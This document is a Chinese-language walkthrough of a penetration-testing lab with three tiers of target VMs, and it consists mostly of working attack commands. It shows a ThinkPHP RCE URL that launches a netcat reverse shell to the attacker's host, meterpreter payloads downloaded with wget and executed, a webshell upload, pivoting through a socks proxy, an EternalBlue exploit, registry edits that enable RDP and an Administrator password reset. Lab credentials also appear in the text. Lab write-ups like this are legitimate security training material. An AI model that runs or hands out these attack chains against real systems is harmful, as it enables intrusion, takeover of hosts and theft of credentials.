实验环境配置
TeamsSix师傅的CFS三层网络环境靶场。
链接:https://pan.baidu.com/s/1BL_19bx3eLBxqplS9zSSrQ 提取码:gjzq
下载好后先配置环境
kali linux
192.168.43.239
Target1_CentOS 7 64 位
192.168.43.142
192.168.64.133
地址:http://192.168.170.138:8888/a768f109/
账号:eaj3yhsl
密码:41bb8fee
Target2_Ubuntu 64 位
192.168.64.132
192.168.33.128
地址:http://192.168.64.132:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..
Target2_Ubuntu 64 位
192.168.33.33
主机密码都是teamssix.com
然后配置target1宝塔服务,用kali访问http://192.168.43.142:8888/a768f109/ ,把target1的ip添加进去即可。  此时能成功访问target1的web服务,target2的配置同理,可以用target3配置,也可以使用kali通过隧道访问target2配置。 
开始实验
kali——>target1
首先使用kali对target1进行攻击 发现目标是thinkphp,使用TPscan工具扫描一波看有没有漏洞 发现有命令执行漏洞
http://192.168.43.142/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
kali nc监听,利用rce漏洞连接获取权限
nc -lvp 1234
http://192.168.43.142/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=nc 192.168.43.239 1234 -e /bin/bash

通过python获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
然后我们将shell转移到msf上去
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.43.239 lport=4444 -f elf > shell.elf
python -m http.server 9999
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.43.239
set lport 4444
exploit
cd /tmp
wget http://192.168.43.239:9999/shell.elf
chmod 777 shell.elf
./shell.elf
成功拿到权限 
getuid
sysinfo
ipconfig or run get_local_subnets
route add 192.168.64.0 255.255.255.0 1
route print
background
search portscan
use 5
set rhost 192.168.64.0/24
set ports 80,8080,7001,8000,8888
set threads 10
run
target所在的网段为192.168.64.0/24。于是对其进行端口扫描,发现目标target2为192.168.64.132,其开放了8888端口(宝塔)和80端口,开始第二阶段渗透。 
target1——>target2
我们使用socks代理将target2所在网段代理出来
route add 192.168.64.0 255.255.255.0 1
route print
search socks
use auxiliary/server/socks_proxy
set version 4a
exploit
vim /etc/proxychains4.conf
在最后修改
socks4 127.0.0.1 1080
proxychains firefox
使用新打开的火狐访问http://192.168.64.132:8888/2cc52ec0/ 配置宝塔,将192.168.64.132:90添加进去 账号:xdynr37d 密码:123qwe… 
然后访问http://192.168.64.132:90/ 可以发现是一个cms,主页中提示有SQL注入漏洞,SQL注入点:/index.php?r=vul&keyword=1 ,不过跑了半天没跑出来。robots.txt中提示了admin后台地址,使用admin/123qwe 进入后台。根据文章bagecms漏洞复现上马
然后通过正向木马将shell转移到msf上
msfvenom -p linux/x64/meterpreter/bind_tcp lport=6666 -f elf > bind_7777.elf
proxychains msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.64.132
set lport 6666
run
使用proxifier连接上kali开启的代理 
然后用菜刀连接木马  上传木马  执行  msf成功获取到shell 
target2——>target3
target2上有下一个网段192.168.33.0/24,老规矩先信息收集
run get_local_subnets
backgroud
route add 192.168.33.0 255.255.255.0 1
search portscan
use auxiliary/scanner/portscan/tcp
set rhost 192.168.33.0/24
set ports 80,8080,8888,3389,445,3389
set threads 10
exploit
发现目标开放445、3389端口  先用永恒之蓝攻击试试
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
run
成功!  开启3389,开启远程登录
chcp 65001
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
直接修改账户密码,利用3389连接
net user
net user Administrator abc123
设置代理
search socks
use auxiliary/server/socks_proxy
set version 4a
set port 1081
exploit
添加代理 
成功连接远程桌面 
知识总结
网段查询
meterpreter > run get_local_subnets
meterpreter > ipconfig
添加路由
route add 192.168.11.0 255.255.255.0 1
route del 192.168.12.0 255.255.255.0 2
route print
run autoroute -s 192.168.11.0/24
run autoroute -d -s 192.168.11.0/24
run autoroute -p
注意:在实际的内网渗透中,我们可以直接添加到 0.0.0.0/0 的路由。这样,只要该被控主机可达的地址就都可达!
端口扫描
search portsacn
use 5
set rhost 192.168.1.1/24
set ports 80,8080,8888,3389,22,23
set threads 10
exploit
msf设置代理
search socks
use auxiliary/server/socks_proxy
set version 4a
exploit
vim /etc/proxychains4.conf
在最后修改
socks4 127.0.0.1 1080
proxychains firefox
|